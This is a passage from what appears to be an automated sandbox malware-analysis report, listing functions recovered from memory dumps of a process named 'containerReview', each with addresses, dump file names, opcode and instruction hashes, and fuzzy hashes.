                                                                    • Opcode Fuzzy Hash: bf75faf31087f64c9f122f3d797aee1c4fae4188133c9bf3648b788a00914d48
                                                                    • Instruction Fuzzy Hash: 5721D430E1895D9FDF99EF18C4A5AADB7B1FB68301F0041AED01EE3691DA35A981CB00
                                                                    Function 00007FF849266222 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9addd3f35d914a0b0ecc75a386e7031e8aea6a1275ce3840f3630190a0339845
                                                                    • Instruction ID: 246e92a52dd37c45bb33eee518ca3843ff61e0f484b05b287eb204652de1937a
                                                                    • Opcode Fuzzy Hash: 9addd3f35d914a0b0ecc75a386e7031e8aea6a1275ce3840f3630190a0339845
                                                                    • Instruction Fuzzy Hash: 1221F771E0891D9FDFA8EB18C465AACB7B1FF68301F0001AAD01EE3691CA35AE418B40
                                                                    Function 00007FF849261CD3 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18bb3d6e58a45b39baa4a350db62b7fe0b6c7763c09fd3f3fca44c27ec998d2f
                                                                    • Instruction ID: 33890e81e55e0972b4e792026c16a8c740e4c269e44771982fff650e51ee885b
                                                                    • Opcode Fuzzy Hash: 18bb3d6e58a45b39baa4a350db62b7fe0b6c7763c09fd3f3fca44c27ec998d2f
                                                                    • Instruction Fuzzy Hash: 99219F31A1C55D8FEBA8EF18D895A7873F1FF89352F00017AD05ED3A92CA25BC418B41
                                                                    Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2aebd927982e8d1957b933c9c617a3a2f396f10e438cfd981931a571288b6ef
                                                                    • Instruction ID: fe4f5b1631993158bfb30f4cec23787f4e6d7f0c157489d54b443e9b05270976
                                                                    • Opcode Fuzzy Hash: f2aebd927982e8d1957b933c9c617a3a2f396f10e438cfd981931a571288b6ef
                                                                    • Instruction Fuzzy Hash: BA21EF7190C699AFE712FB68C8452EC7FA0FF423A0F5545BAC044AB1C2DB3829898795
                                                                    Function 00007FF84926A598 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9df39718b1c0cae19e753c0fede8510e1e9f1d7ee287e46cf953e6017ea970d8
                                                                    • Instruction ID: febf4f058c5995bc2abaaf0dbcea7bede78358b3c7b8d3b3860b461de0057afc
                                                                    • Opcode Fuzzy Hash: 9df39718b1c0cae19e753c0fede8510e1e9f1d7ee287e46cf953e6017ea970d8
                                                                    • Instruction Fuzzy Hash: 65213730E1C99EAFEB98EF58D8A05ECBBB1FF58341F500479D01AE3291DA246C158B50
                                                                    Function 00007FF849261D37 Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 41682707014e9ac8a7b8e99918f8a3d8cf9b137ed843c55cc936cf3d467936eb
                                                                    • Instruction ID: c78f474af27bf00ec513fb0aac8d12cc12636da3f45a02805e58db7824338f0f
                                                                    • Opcode Fuzzy Hash: 41682707014e9ac8a7b8e99918f8a3d8cf9b137ed843c55cc936cf3d467936eb
                                                                    • Instruction Fuzzy Hash: EC1133306189188FDB58EF1CD855AA9B3F2FF99311F1141AFD04ED7666CB31AC458B40
                                                                    Function 00007FF849262199 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e36c1e45112ebf66a1da63c9f852e97a8e7f4b77fb85d0adc2d76bc72b19cf6d
                                                                    • Instruction ID: 6d1e4346b35a31bbadeb31654bb3dbf6619e4016f8c6169b05d128d6c7fda1b1
                                                                    • Opcode Fuzzy Hash: e36c1e45112ebf66a1da63c9f852e97a8e7f4b77fb85d0adc2d76bc72b19cf6d
                                                                    • Instruction Fuzzy Hash: 59113A32D0D7DE5FFB74AA7448442F937A1EF5A391F040177D019E7582DE686C4A83A1
                                                                    Function 00007FF849263E00 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4583aee2275f86bd8163a636021a46302e84b25abf4380f209709a9a5e9135a
                                                                    • Instruction ID: dd4289a89f824691a9449a4d24f9dea0db821521a1e11fe7fb72e35bc5f26eda
                                                                    • Opcode Fuzzy Hash: f4583aee2275f86bd8163a636021a46302e84b25abf4380f209709a9a5e9135a
                                                                    • Instruction Fuzzy Hash: 2E11E710D1C4B7CEF6799A0894A05F67292FF50382B244679D4EB8B9CAC83CFD869390
                                                                    Function 00007FF84926DD10 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3130f1f588f4496f15fad8e67f5f013769c4731f5b66ccf5919cb58019fa05c
                                                                    • Instruction ID: 9b32e55c767a4cfd3676955f71ca70d0a8398e84128d6a6f0a1064c3a8d48dfd
                                                                    • Opcode Fuzzy Hash: f3130f1f588f4496f15fad8e67f5f013769c4731f5b66ccf5919cb58019fa05c
                                                                    • Instruction Fuzzy Hash: FC11A51191C8BF8EF67CBA0888A07B47255FF51342F144E75D1AB8B89ACC28BC81A280
                                                                    Function 00007FF849261CDC Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1a544d4ff52c925428f882f3918326a5d279c5d11452e89218b183348235d6f
                                                                    • Instruction ID: db4da99ab8a166bf50839f073b356e7bd44db28334c72fdbe71e77b9a3c16070
                                                                    • Opcode Fuzzy Hash: c1a544d4ff52c925428f882f3918326a5d279c5d11452e89218b183348235d6f
                                                                    • Instruction Fuzzy Hash: D2118230A196188FEB58EF18D896AB9B3E1FF59311F10017FD05ED36A2CB217C418B40
                                                                    Function 00007FF849267EB0 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945025bbf166632f3d62fd10ab9e3dac753478ae82de27607f5b93af1a5a2996
                                                                    • Instruction ID: 92cb925a4b27783e6dcdf4b8b3fd9fd1b230e41c03c7a530580fde64d8703179
                                                                    • Opcode Fuzzy Hash: 945025bbf166632f3d62fd10ab9e3dac753478ae82de27607f5b93af1a5a2996
                                                                    • Instruction Fuzzy Hash: 2F11A33191894A4FEF64FF28A4015F573D1FF94395F00067AD40EC3986DF29B8098655
                                                                    Function 00007FF849262E80 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0da9b883679f8000c723e667a38ce53cd11a077bea73898fc1bb1fffa0352e5
                                                                    • Instruction ID: 52341d9e24d16323ac950fbe5763b83eead46f358f4dcb758b3429a21517b406
                                                                    • Opcode Fuzzy Hash: c0da9b883679f8000c723e667a38ce53cd11a077bea73898fc1bb1fffa0352e5
                                                                    • Instruction Fuzzy Hash: 3A11CA21A1891A8FEB64FB6994015BA7391FF60392F40063AD44EC3982CF28B80986A1
                                                                    Function 00007FF84926CD90 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce68a611d12d3dfb7b4b1489727fcb0177313d58001efcfa06ceed352f8e995d
                                                                    • Instruction ID: 39b885141530fbe19e6165c09f15c66a412efb6ed02e9f8d22081aff716aaab5
                                                                    • Opcode Fuzzy Hash: ce68a611d12d3dfb7b4b1489727fcb0177313d58001efcfa06ceed352f8e995d
                                                                    • Instruction Fuzzy Hash: 6D11A031A1994A8EEF64FF2894015FA73A1FF54391F00063AD45FC3992CF38B80987A5
                                                                    Function 00007FF848E65534 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction ID: 5a5fb26b5a360e80a853b985bf0c795c75e97f94f7fe8126292690efb4c8a6ba
                                                                    • Opcode Fuzzy Hash: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction Fuzzy Hash: C7113320E1CA1D4EE764BA1898592B872D1FF64350F9001B9D40EF72E3EF387D458649
                                                                    Function 00007FF84926CC0E Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ed682897952bbee0d9b8ef0d7c40afc6411340334ba68a4dfcfba9811bfcf52
                                                                    • Instruction ID: 660e5faa274b574b49de0fd89f7646f1c1bab3068e3395451314c98a12c8185e
                                                                    • Opcode Fuzzy Hash: 4ed682897952bbee0d9b8ef0d7c40afc6411340334ba68a4dfcfba9811bfcf52
                                                                    • Instruction Fuzzy Hash: 7101D63160844A8FFB24FE58D4112E57391EF55392F10013BDA2DC7AC1DB39B8558B91
                                                                    Function 00007FF849267D2E Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b638261e6327ffdc38815ca25fd8fcf653c473567fa63365d30648a0f2729c3
                                                                    • Instruction ID: 7419817a31eb77f7fdca045460c0dd61e1d4d414dc619c4e1f8d13bdb5da7922
                                                                    • Opcode Fuzzy Hash: 9b638261e6327ffdc38815ca25fd8fcf653c473567fa63365d30648a0f2729c3
                                                                    • Instruction Fuzzy Hash: 5001263160854B8FFB24AE18E4107F43395EF90396F10053BE92DC3A80DB39AC548B50
                                                                    Function 00007FF849262CFE Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dcdab9702f3dcb3ff553af843e1e32d4a757a0f3fb572ecaa0503b9615fb772
                                                                    • Instruction ID: c120f503d5b2b10f5019583ed84df17e8b1063e7862cbc39abd595407439c073
                                                                    • Opcode Fuzzy Hash: 9dcdab9702f3dcb3ff553af843e1e32d4a757a0f3fb572ecaa0503b9615fb772
                                                                    • Instruction Fuzzy Hash: 4D01F53160944B8FFB29AF58E8512E57391FFA4392F10023BD92DC7A81DB39B8548B90
                                                                    Function 00007FF849262369 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5772c3adab79322736c9f9b0321e968d206e2906764baca75920323bff873dd9
                                                                    • Instruction ID: 09d3fccd99bda7807f9edd3276b729e728a002b9b992155499751e9e33496051
                                                                    • Opcode Fuzzy Hash: 5772c3adab79322736c9f9b0321e968d206e2906764baca75920323bff873dd9
                                                                    • Instruction Fuzzy Hash: 0601B531E0D9598FEB59FBA8A4516EC77A1FF49361F14017ED01ED32C3DE2958018700
                                                                    Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction ID: f014a9776ce4ace1c321e131a013213350cba038f7e64a5605fa89d0002d1555
                                                                    • Opcode Fuzzy Hash: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction Fuzzy Hash: DD01A93190D7989FE702FB68C8402D9BFB0EF42260F1545E6C084EB292D6386A488B94
                                                                    Function 00007FF8492610F9 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a9f6f7edba17942e0caaf3ea050964fc5cf9e4780f6f885ef1035712b14bb0a
                                                                    • Instruction ID: 6d889e9222c14489d8e7cb5e78a7b8082bf21e6f20955746c360d328ec5ade87
                                                                    • Opcode Fuzzy Hash: 9a9f6f7edba17942e0caaf3ea050964fc5cf9e4780f6f885ef1035712b14bb0a
                                                                    • Instruction Fuzzy Hash: 5601ED70D0899DDFDB98EF58C4A5AB8BBB1FB64741F0404ADC01DE7692DA356980CB00
                                                                    Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction ID: 5b81689088e1651b8ea27da21b17f62667958134c266d0842065b5076d6c5dd7
                                                                    • Opcode Fuzzy Hash: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction Fuzzy Hash: 4C015A7190D7889FE706EB78C844699BFB0EF42314F1945EAD044EB2A2D6386A48C795
                                                                    Function 00007FF84926B3F2 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97816b313ba50a562e5a9d15e9082400c9cff46235fef3bcec67b2a7f261e4f8
                                                                    • Instruction ID: bc5224ac6a6284dfe6d4b7461d3518c4a468596d480c209071a2cd604ac23d9d
                                                                    • Opcode Fuzzy Hash: 97816b313ba50a562e5a9d15e9082400c9cff46235fef3bcec67b2a7f261e4f8
                                                                    • Instruction Fuzzy Hash: A2F0963284E2C59FE3169F7088655E53FB4FF43255F1800FAD455C74A3CA6D590AC761
                                                                    Function 00007FF849266532 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ff11889799cef6a3271e8a30a852e5c91d7840aa03a856074412f0e6f37a748
                                                                    • Instruction ID: 95836a3da992843b1cf6774157494c34e82d4f70a7324d5c37854857feea665c
                                                                    • Opcode Fuzzy Hash: 7ff11889799cef6a3271e8a30a852e5c91d7840aa03a856074412f0e6f37a748
                                                                    • Instruction Fuzzy Hash: 45F0C23284E2C59FE722EF7088164E53FB4FF42345F1400FAE095C60A2CA2C5B06C761
                                                                    Function 00007FF848E6566A Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction ID: d9e9e5e114ba3435dc3cd7457d5a57069b717a1a9f1459f116fc6fd3c0df7d05
                                                                    • Opcode Fuzzy Hash: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction Fuzzy Hash: 63F0313090C91E8EEB64FA14DC486B873A2FF64351F9001B9D44EF7192EF387D958A08
                                                                    Function 00007FF848E61A46 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a352c191027afef22415962ad2d68cd243e17152e817e8fbc47eab804aa2de2
                                                                    • Instruction ID: 6a084f2402dd74d8b05eb73b6f6ba78d64d53538e1b8098d9d6ec9538b3b6ca6
                                                                    • Opcode Fuzzy Hash: 2a352c191027afef22415962ad2d68cd243e17152e817e8fbc47eab804aa2de2
                                                                    • Instruction Fuzzy Hash: 3C011231908918CFCB58DB18D894E9973F1FB58310F040299D40DE72A1CB35AE80CF85
                                                                    Function 00007FF8492660D7 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 625b38b502b027ccfc70226efd146ae38f03aad0719e3da98e49b03052c5a8cf
                                                                    • Instruction ID: f20ed47a74ec564a557ead6235841dc8b773ba82f16ad897418a529a820cd76c
                                                                    • Opcode Fuzzy Hash: 625b38b502b027ccfc70226efd146ae38f03aad0719e3da98e49b03052c5a8cf
                                                                    • Instruction Fuzzy Hash: 0301FB7090895DDFDB68EF18C490AA8BBB1FB58340F1401A9D00EE3291CA306D40CB40
                                                                    Function 00007FF849261502 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 303f0a92aceb33740aa03f80d9247f20478d8814da78d2b5fc3a09bc33433eae
                                                                    • Instruction ID: 740468fbcc587564cff68635910e6293033d54dfa4d5834ec923c28abfc2b09b
                                                                    • Opcode Fuzzy Hash: 303f0a92aceb33740aa03f80d9247f20478d8814da78d2b5fc3a09bc33433eae
                                                                    • Instruction Fuzzy Hash: E8F0623184E2C59FE712EF7088529957FA4AF43341F1800F6E056970A3C56D2A0AC761
                                                                    Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction ID: 1d494a934a9f4f92c3d2dbaecd3e8bb8dcd43c5ac94dc5e43bfe9a6d2a606513
                                                                    • Opcode Fuzzy Hash: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction Fuzzy Hash: 40014B7090D7C99FE706FB74884469DBFF0EF06314F1845E6D444EB292DA386A48C745
                                                                    Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction ID: 0463724105c59fff87dbdcdee3fb92fd12cc528830111bc805b7b8e71b0cb601
                                                                    • Opcode Fuzzy Hash: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction Fuzzy Hash: 9AF0553020DA89CFC742AB3DC8A08D0BF60FF43204B8A00FAC088CB462C3245C5ECB00
                                                                    Function 00007FF848E6563C Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction ID: 44e6ecc7956d6d1cc20c6e6cfc4d34b3b502825c445b06d011b98d177ef14cdb
                                                                    • Opcode Fuzzy Hash: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction Fuzzy Hash: 5BF03030A0C9198EEA64F604DC486B87392FF64390F9011BAD84EF71A3EF387D858648
                                                                    Function 00007FF849267D08 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 140076246536fdc6ef4d3c713600b7f582fbe191645fa32ce6a946eb0ee202c1
                                                                    • Instruction ID: 5728b9638ad4a0a0ea54ac58705eb354cd7c547d47fecdad210220811c95567a
                                                                    • Opcode Fuzzy Hash: 140076246536fdc6ef4d3c713600b7f582fbe191645fa32ce6a946eb0ee202c1
                                                                    • Instruction Fuzzy Hash: 0AF0EC2090D69B8EFB387E24B4013B82248AFA0392F30083AC43E82DC1CE2D3C024292
                                                                    Function 00007FF84926CBE8 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
